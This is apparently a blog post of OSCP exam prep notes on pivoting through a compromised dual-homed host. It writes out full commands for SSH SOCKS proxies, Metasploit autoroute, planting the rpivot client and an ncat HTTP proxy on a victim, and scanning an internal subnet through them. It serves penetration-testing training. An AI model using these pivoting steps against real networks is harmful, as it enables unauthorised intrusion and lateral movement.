Advanced Pivoting Tactics I learned during the Penetration Testing with Kali Linux Course (supplementary material)

How to create a REVERSED Dynamic SOCKS proxy that runs on the victim (alternative to Metasploit routing)

What is a dynamic SOCKS proxy? Well normally, when you compromised a system that has SSH running, with a multi-homed double+ NICs (one as 10.1.1.230 and one as 10.11.1.230), you would

ssh -NfD 1080 root@victim

And then to run a nmap scan through that victim (the scans appear to be coming from your compromised victim)

echo 'socks4 127.0.0.1' >> /etc/proxychains.conf

Comment out ‘# socks4 127.0.0.1 9050’

proxychains nmap -sT -Pn -O -sV -sU 10.1.1.0/24

For non-SSHable machines without OpenSSH installed (before Windows 10) via Metasploit (restricted in exam)

You would pop a Meterpreter shell and run

sessions -C 'run autoroute'
use auxiliary/server/socks4a
run -j

And repeat the same proxychains command

However, there is a problem.

1. Metasploit REQUIRES a Meterpreter shell to use it’s internal routing system

2. Metasploit/Meterpreter usage is restricted to ONE machine on the OSCP exam

3. Therefore, you should restrict your usage of Metasploit/Meterpreter until you really need it, and rely mainly on netcat, ncat, and socat to catch shells.

The alternative…

You can create a reversed dynamic SOCKS proxy using this publicly available tool called rpivot. Simply git clone the repo

git clone --recursive https://github.com/klsecservices/rpivot

And download and unzip the released file with the Windows executable binary

wget https://github.com/klsecservices/rpivot/releases/download/v1.0/client.exe -O rpivot.exe

Now drop rpivot.exe into the victim and run the client. Assume that me, the attacker is IP address 10.11.0.30 and the compromised dual-homed machine is 10.11.1.230/10.1.1.230

Start your listener.

python server.py --server-port 9999 --server-ip 0.0.0.0 --proxy-ip 10.11.1.230 --proxy-port 1080

Navigate to the directory on the victim’s Windows cmd.exe command line and run

rpivot.exe --server-ip 10.11.0.30 --server-port 9999

Now repeat the process of editing your proxychains config and run the proxychained scan

proxychains nmap -sT -Pn -O -sV -sU 10.1.1.0/24

How to drop a HTTP Proxy on the victim with ncat

Alternatively, you can drop ncat.exe into your victim to create a more capable HTTP proxy listener. Which gives you several advantages.

1. You can run HTTP-proxy aware tools such as Firefox, BurpSuite, and Nikto through the proxy

2. As HTTP Proxy operates on Layer 7 (Application) of the OSI model, you can derive more data and perform pivoted HTTP, URL injection, SQL Injection, and XSS attacks through the proxy

Download ncat.exe and drop it on the victim

wget http://nmap.org/dist/ncat-portable-5.59BETA1.zip -O ncat.zip && unzip ncat.zip -d ncat && cd ncat

Now on the victim’s Windows command line run

ncat.exe --listen --proxy-type http 127.0.0.1 8080

Remember that the proxy listener and bound port is ON THE VICTIM (10.11.1.230), therefore, you must comment out the previous socks4 127.0.0.1 1080 line in /etc/proxychains.conf and replace it with

http 10.11.1.230 8080

You can still use proxychains the way it is. Or, for proxy-aware apps, here’s a Nikto example to scan the new unlocked subnet using this proxy as a launching point for attacks

nikto -host 10.1.1.236 -port 80 -proxy http://10.11.1.230:8080

I hope you enjoyed this portion of OSCP-Enhancement Skills!

 

 

 

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s